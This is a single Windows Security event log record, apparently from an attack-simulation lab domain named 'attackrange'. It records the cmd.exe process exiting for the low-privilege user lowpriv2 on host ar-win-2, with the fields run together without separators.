4689001331300x8020000000000000395264Securityar-win-2.attackrange.localATTACKRANGE\lowpriv2lowpriv2ATTACKRANGE0x96ba380xc000013a0xb44C:\Windows\System32\cmd.exe